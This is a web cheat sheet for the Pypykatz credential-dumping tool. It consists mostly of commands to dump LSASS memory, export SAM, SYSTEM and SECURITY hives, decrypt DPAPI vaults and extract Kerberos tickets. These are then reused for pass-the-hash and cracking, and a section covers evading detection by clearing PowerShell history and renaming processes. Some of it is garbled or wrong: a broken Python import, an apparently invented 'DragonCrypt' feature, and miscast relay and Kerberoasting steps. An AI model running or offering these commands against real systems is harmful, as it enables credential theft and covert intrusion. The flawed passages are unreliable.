Pypykatz
Pypykatz is a pure Python implementation of Mimikatz for credential extraction without launching the actual Mimikatz binary, enabling better AV evasion.
Installation
# Install via pip
pip install pypykatz
# Or clone and install
git clone https://github.com/skelsec/pypykatz.git
cd pypykatz
pip install -e .
# Verify installation
pypykatz --versionBasic Usage
| Command | Description |
|---|---|
pypykatz live lsa | Dump LSASS from live system |
pypykatz lsa minidump file.dmp | Parse minidump file |
pypykatz registry -r hive_file | Parse registry hive |
pypykatz dpapi -m masterkey file | Decrypt DPAPI |
pypykatz --help | Display help menu |
LSASS Credential Extraction
Live LSASS Dumping
# Dump from live LSASS process (requires admin)
pypykatz live lsa
# Output includes:
# - NTLM hashes
# - Plaintext passwords
# - Kerberos tickets
# - Session keys
# - SSP credentials (Digest, NTLM, Kerberos)Minidump Parsing
# Create minidump (using procexp, ProcDump, or WER)
tasklist | findstr lsass
# PID: 600
# Generate minidump
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump 600 C:\path\minidump.dmp full
# Parse with pypykatz
pypykatz lsa minidump C:\path\minidump.dmp
# Output: credentials in plaintext or hash formatRegistry Hive Parsing
SAM and SYSTEM Hive
# Export hives (requires admin)
reg save HKLM\SAM C:\sam
reg save HKLM\SYSTEM C:\system
# Parse with pypykatz
pypykatz registry -r C:\sam C:\system
# Outputs NTLM hashes for all usersSecurity Hive Parsing
# Export SECURITY hive
reg save HKLM\SECURITY C:\security
# Extract cached domain credentials
pypykatz registry -r C:\securityDPAPI Decryption
Masterkey Extraction
# Locate masterkey files
# Typically: C:\Users\<user>\AppData\Roaming\Microsoft\Protect\<SID>\<GUID>
# Extract with pypykatz
pypykatz dpapi masterkey -password "UserPassword" -masterkey_file "masterkey_path"
# Returns decrypted masterkey for further credential decryptionDPAPI Blob Decryption
# Decrypt credentials vault
pypykatz dpapi vault -password "UserPassword" -vault_file "vault_file"
# Can extract:
# - Saved website credentials (Internet Explorer, Chrome)
# - RDP credentials
# - VPN credentialsKerberos Ticket Extraction
Live Ticket Extraction
# Extract Kerberos tickets from LSASS
pypykatz live lsa
# Output includes:
# - TGT (Ticket Granting Ticket)
# - Service tickets
# - Ticket timestamps
# - Session keysTicket Reuse (Pass-the-Ticket)
# Export tickets in Mimikatz format
pypykatz live lsa --output-format kirbi
# Use with Rubeus or Mimikatz
Rubeus.exe ptt /ticket:ticket.kirbiCredential Formats
NTLM Hash Format
Username:RID:LMHash:NTHash
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586cPlaintext Passwords
Domain\Username:Password
DOMAIN\admin:P@ssw0rd123Kerberos Tickets
[*] Credential: <domain>\<username>@<realm>
CredentialType: Kerberos
CredentialInfo:
Ticket: <base64-encoded-ticket>Advanced Usage
JSON Output
# Output credentials in JSON format
pypykatz live lsa --output-format json > creds.json
# Parse JSON for further processing
cat creds.json | jq '.credentials[]'Minidump with DragonCrypt (Encrypted LSASS)
# Some Windows versions encrypt LSASS in memory
# Pypykatz handles both encrypted and unencrypted dumps
# Create minidump and parse normally
pypykatz lsa minidump dump.dmpMultiple Dump Analysis
# Parse multiple minidumps and consolidate results
for dump in *.dmp; do
pypykatz lsa minidump "$dump" >> all_creds.txt
doneOperational Security Considerations
Avoiding Detection
# Load pypykatz without disk artifacts
powershell -NoProfile -ExecutionPolicy Bypass "& {$env:PYTHONIOENCODING='utf-8'; python3 -m pypykatz live lsa}"
# Obfuscate process name
# Use Process Hacker to rename python.exe process
# Clear PowerShell history
Clear-History
Remove-Item (Get-PSReadlineOption).HistorySavePathCredential Handling
# Parse output safely
import pypykatz.lsass.lsass_processmemoryreader import LsassProcessMemoryReader
import pypykatz.dpapi.dpapi import DPAPI
# Decrypt credentials in memory
# Never write plaintext to disk
# Wipe sensitive data from memoryExploitation Examples
NTLM Relay Attack Chain
# 1. Dump NTLM hashes with pypykatz
pypykatz live lsa | grep "NTLM"
# 2. Use hashes in NTLM relay attack
# responder -I eth0
# ntlmrelayx.py -t <target>
# 3. Harvest credentialsKerberoasting
# 1. Extract Kerberos tickets
pypykatz live lsa --output-format kirbi
# 2. Crack service tickets
hashcat -m 13100 tickets.txt wordlist.txtPass-the-Hash
# 1. Extract NTLM hash
pypykatz live lsa | grep NTHash
# 2. Use with PtH tools
psexec.py -hashes ":hash" domain/user@target cmd.exeLimitations
- Requires local admin for live LSASS access
- Minidump must be created with sufficient privileges
- Some encryption methods (like Virtual Secure Mode) may prevent decryption
- Registry hives require offline access for SAM/SYSTEM
- DPAPI decryption requires user password or masterkey
Alternatives and Alternatives
- Mimikatz: Original credential extraction tool
- Rubeus: Kerberos-focused credential extraction
- Secretsdump: Credential dumping via remote registry
- Get-GPPPassword: Group Policy Preferences password extraction
- LaZagne: Password recovery from various applications
Credential Dumping Checklist
# Comprehensive credential extraction:
# 1. LSASS dump
pypykatz live lsa
# 2. Registry hives
reg save HKLM\SAM sam.hive
reg save HKLM\SYSTEM sys.hive
pypykatz registry -r sam.hive sys.hive
# 3. DPAPI credentials
pypykatz dpapi vault ...
# 4. Kerberos tickets
pypykatz live lsa (check Kerberos section)
# 5. Consolidate and crack
hashcat -m 1000 hashes.txt wordlist.txtLast updated: March 2025 | GitHub